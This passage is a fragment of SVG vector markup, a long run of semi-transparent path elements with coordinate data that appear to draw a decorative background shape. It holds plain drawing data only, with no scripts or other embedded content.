2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path 